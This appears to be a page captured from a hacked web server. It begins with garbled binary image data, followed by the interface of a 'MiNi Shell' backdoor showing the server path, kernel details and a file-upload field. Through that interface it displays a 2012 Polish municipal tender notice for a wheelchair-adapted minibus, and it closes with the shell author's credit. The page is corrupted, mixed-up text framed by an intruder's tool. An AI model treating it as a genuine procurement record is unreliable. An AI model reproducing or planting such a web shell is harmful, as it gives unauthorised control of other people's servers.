JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120508/144186-N-2012.html

<p class="kh_header"><b>Stare Miasto: Zakup 9 osobowego mikrobusu przystosowanego 
do przewozu osób niepełnosprawnych 
i 1 wózka inwalidzkiego
Zakup jest dofinansowany ze środków PFRON w ramach programu pn.:
Program wyrównywania różnic między regionami</b><br>
<b>Numer ogłoszenia: 144186 - 2012; data zamieszczenia: 08.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stare Miasto , ul. Główna 16b, 62-571 Stare Miasto, woj. wielkopolskie, tel. 063 2416216, faks 063 2416580.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stare-miasto.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup 9 osobowego mikrobusu przystosowanego 
do przewozu osób niepełnosprawnych 
i 1 wózka inwalidzkiego
Zakup jest dofinansowany ze środków PFRON w ramach programu pn.:
Program wyrównywania różnic między regionami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.
1)	Fabrycznie nowy pojazd rok produkcji 2012,
2)	Mikrobus 9 osobowy 
3)	Ilość sztuk - 1
Oferowany samochód musi spełniać normy emisji spalin zgodnie z Rozporządzeniem WE Nr 715/2007 Parlamentu Europejskiego i Rady z dnia 20 czerwca 2007r. w sprawie pojazdów silnikowych w odniesieniu do emisji zanieczyszczeń pochodzących z lekkich pojazdów pasażerskich (EURO 5), tj. emituje maksymalnie:
- tlenek węgla (CO) 500mg/km
- tlenków azotu (NOx) 180mg/km
- łącznie węglowodorów i tlenków azotu (THC + NOx) 230mg/km
- masa cząstek stałych (MP) 5,0/4,5 mg/km
Miejscem dostawy - odbioru samochodu będzie siedziba Zamawiającego. Wykonawca dostarczy samochód na własny koszt do siedziby Zamawiającego, przy czym zobowiązany jest powiadomić             z dwudniowym wyprzedzeniem Zamawiającego o planowanym terminie dostawy. Dostawa odbędzie się w dniach i godzinach urzędowania Zamawiającego.
Typ nadwozia:
1)	kombi, przeszklony,
2)	boczne drzwi przesuwane z prawej strony, z osłoniętą prowadnicą, z zabezpieczeniem przed otwarciem przez dzieci,
3)	tylne drzwi z oknem, podnoszone,
4)	kolor do uzgodnienia z Zamawiającym (np. srebrny metalik), Tapicerka materiałowa w odcieniu szarości lub grafitu, o wysokiej wytrzymałości na przetarcia i zabrudzenia.
5)	wymiary: rozstaw osi - 3200-3500 cm, długość auta - nie większa niż 5300 cm
Układ napędowy:
1)	pojemność silnika min. 2,0 diesel z turbodoładowaniem, norma EURO 5,
2)	moc silnika - min. 140 KM, 
3)	rodzaj paliwa - olej napędowy
4)	katalizator w standardzie
5)	skrzynia manualna 6 biegowa + bieg wsteczny
6)	 Średnie zużycie paliwa w cyklu mieszanym - max 9 l /100 km
Wyposażenie min. samochodu:
1)	Wspomaganie układu kierowniczego 
2)	Immobiliser 
3)	Tempomat
4)	Centralny zamek z zabezpieczenie sterowany pilotem
5)	Nawigacja GPS
6)	System zapobiegający blokowaniu kół ( ABS) 
7)	Systemy kontroli trakcji: układ EDS, układ ASR, układ MSR, układ ESP
8)	Hamulce tarczowe wentylowane z przodu i z tyłu 
9)	Alarm honorowany przez firmy ubezpieczeniowe
10)	Poduszka powietrzna dla kierowcy i pasażera 
11)	Niezależne zawieszenie przednie i tylne ze stabilizatorem
12)	Napęd na koła przednie lub tylne
13)	Obrotomierz elektroniczny
14)	Światła do jazdy dziennej włączane automatycznie
15)	Światła przeciwmgielne z przodu zintegrowane ze zderzakiem
16)	Światło przeciwmgielne z tyłu
17)	Dźwignia zmiany biegów w formie joysticka
18)	Klimatyzacja trzystrefowa z elektroniczną, z dodatkowym sterowaniem w przestrzeni pasażerskiej - dwie listwy wielofunkcyjne w podsufitce z nawiewami i lampkami do czytania
19)	3 punktowe pasy bezpieczeństwa z napinaczami i regulacją wysokości zamocowania
20)	Zagłówki z regulacją wysokości
21)	Regulacja kolumny kierownicy w dwóch płaszczyznach
22)	Podłoga wyłożona wykładzina welurową, antypoślizgowa 
23)	Pełna tapicerka przestrzeni pasażerskiej 
24)	Przeszklenie przedziału pasażerskiego - szyby przyciemniane
25)	Trzecie światło STOP 
26)	 Podwójne siedzenie obok kierowcy 
27)	Składany i wyjmowany drugi rząd siedzeń 2+1miejscowe
28)	Składany i wyjmowany 3 rząd siedzeń 3 miejscowy
29)	Radio MP3 z instalacją radiową i głośnikami 
30)	Kierownica wielofunkcyjna
31)	Ogrzewanie na przód i tył z osobną regulacją 
32)	Lusterka boczne ogrzewane, składane i sterowane elektrycznie 
33)	 Szyby przednie sterowane elektrycznie 
34)	 Ogrzewane tylne szyby z wycieraczkami
35)	Czujniki parkowania w przednim i tylnym zderzaku
36)	Wyposażenie pojazdu w trójkąt, gaśnicę, apteczkę, chlapacze przeciw błotne, pełnowymiarowe koło zapasowe,
37)	Okno przesuwane w przestrzeni pasażerskiej po lewej stronie,
38)	Dywaniki gumowe w przedziale kierowcy na podłodze,
39)	Dodatkowy komplet opon zimowych na felgach stalowych - 4 komplety
40)	Dodatkowe pokrowce na wszystkie siedzenia 
41)	Oświetlenie przestrzeni pasażerskiej; oświetlenie stanowiska kierowcy; światła drzwi włączane automatycznie przy ich otwarciu
42)	Gniazdo 12V z zapalniczką
43)	Punkty mocowania pod bagażnik dachowy (10szt)
44)	Siedzenia szybko demontowane w tylnym rzędzie
Przystosowanie dla osób niepełnosprawnych:
1)	wyposażony w tylnej części pojazdu w lekki podjazd składany umożliwiający wjazd wózkiem inwalidzkim o nawierzchni antypoślizgowej,
2)	możliwość przewozu 9 osób lub 6 z zamontowanym wózkiem,
3)	komplet pasów zaczepnych do mocowania wózków,
4)	komplet pasów biodrowych,
5)	zamontowanie szyn podłogowych do mocowania wózków na podłodze,
6)	wszystkie fotele przestrzeni pasażerskiej szybko demontowane w układzie:
- fotel 3 osobowy z 3 rzędu i fotel 2 osobowy + 1 osobowy z 2 rzędu
7)	oznakowanie pojazdu z przodu i z tyłu (symbolem: pojazd dla osób niepełnosprawnych) oraz napisem Dofinansowano ze środków PFRON z logo PFRON
8)	homologacja do przewozu osób niepełnosprawnych lub dokumenty niezbędne do rejestracji pojazdu (badanie techniczne, oświadczenie wykonawcy, KRS).
9) Dodatkowe kierunkowskazy w tylnych narożnikach dachu pojazdu
Warunki gwarancji (minimum wymagane - licząc od dnia zakupu):
1)	bez limitu kilometrów - 36 miesięcy na sprawne działanie samochodu;
2)	na powłokę lakierniczą 36 miesięcy;
3)	na perforację nadwozia 96 miesięcy;
4)	oferowany przez Wykonawcę samochód powinien spełnić warunki, od których właściwe przepisy prawa,    w tym ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym, umożliwiają dopuszczenie danego pojazdu do ruchu na terytorium RP, potwierdzone świadectwem homologacji dla danego typu pojazdu.
5)	Certyfikat na pasy bezpieczeństwa
6)	Pełna dokumentacja w języku polskim
7)	Dostępność serwisu - autoryzowana stacja serwisowa znajdująca się maksymalnie 50km od siedziby Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.52.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. akceptowany wzór umowy opracowany przez Zamawiającego, Zamawiający wymaga zawarcia umowy na warunkach określonych we wzorze umowy - potwierdzeniem tego warunku będzie akceptowany wzór wg załącznik nr 3 SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający na podstawie art. 144 ustawy Prawo zamówień publicznych przewiduje następujące warunki dokonania zmian postanowień niniejszej umowy:
1) wystąpienia zdarzeń losowych,
2) zmiany terminu realizacji umowy (tj. terminu rozpoczęcia i/lub zakończenia)
3) zmian wynikających z przepisów podatkowych.
2.	Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w przypadkach określonych  w punkcie 27 podpunkt 1 litera a) i wymagają pisemnego aneksu pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stare-miasto.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Stare Miasto
ul. Główna 16b
62-571 Stare Miasto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2012 godzina 10:00, miejsce: Gmina Stare Miasto
ul. Główna 16b
62-571 Stare Miasto
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com